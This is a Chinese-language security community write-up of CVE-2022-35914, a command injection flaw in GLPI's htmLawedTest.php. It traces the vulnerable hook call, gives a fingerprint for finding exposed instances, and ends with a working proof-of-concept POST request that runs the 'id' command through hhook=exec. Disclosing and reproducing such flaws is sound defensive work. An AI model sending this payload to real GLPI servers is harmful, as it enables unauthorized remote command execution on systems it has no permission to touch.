奇安信攻防社区-GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

# GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914 ## 漏洞描述 GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口，你可以用它来建立数据库全面...

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914
=============================================

漏洞描述
----

GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口，你可以用它来建立数据库全面管理IT的电脑，显示器，服务器，打印机，网络设备，电话，甚至硒鼓和墨盒等。GLPI 10.0.2及之前版本存在安全漏洞，该漏洞源于htmlawed 模块中 允许 PHP 代码注入

漏洞影响
----

GLPI

网络测绘
----

title="GLPI"

漏洞复现
----

登录页面

![img](https://shs3.b.qianxin.com/butian_public/f237542e49ddd3923317b8c9dc78eeab0519e222f308a.jpg)

出现问题的文件为 **htmLawedTest.php，** 来源于第三方库 PHP Labware

![img](https://shs3.b.qianxin.com/butian_public/f926046685e778cdb7a485abcc691627b5e8a79f09fd5.jpg)

```sql
https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/
```

在 htmLawedTest.php 中接收参数并传入方法 htmLawed 中

![img](https://shs3.b.qianxin.com/butian_public/f2321226109e9a7de15fde38d933523eeef83690b47bd.jpg)

跟进文件 htmLawed.php 中

![img](https://shs3.b.qianxin.com/butian_public/f36033326acda18b1343219d3de0d0d8399a47fe78e9d.jpg)

```sql
if($C['hook']){$t = $C['hook']($t, $C, $S);}
```

这里可以看到参数均为用户可控参数，当控制参数 hhook 为 exec 和 text 为执行的命令时就导致了命令执行漏洞

![img](https://shs3.b.qianxin.com/butian_public/f923524398cc2f1c1715a52cb4707da23a5979fd1ac13.jpg)

验证POC

```sql
/vendor/htmlawed/htmlawed/htmLawedTest.php
```

![img](https://shs3.b.qianxin.com/butian_public/f650118103fe741643386376ee91ffa7712bf327aad77.jpg)

![img](https://shs3.b.qianxin.com/butian_public/f25223166c2ae19ebcfd5bbb997044ec12c406de2ebaa.jpg)

访问页面获取到 sid 与 token 后再发送请求包

```sql
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 88
Content-Type: application/x-www-form-urlencoded

token=a79cf121bde57fe0e3cc0f247f77961a&text=id&hhook=exec&sid=h1c0vk004dvulal5nj8i6en44e
```

![img](https://shs3.b.qianxin.com/butian_public/f52449154527cff1313051e0b61248ddec3a3026802c0.jpg)

发表于 2024-07-12 18:46:04
阅读 ( 2019 )
分类：Web应用

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

0 条评论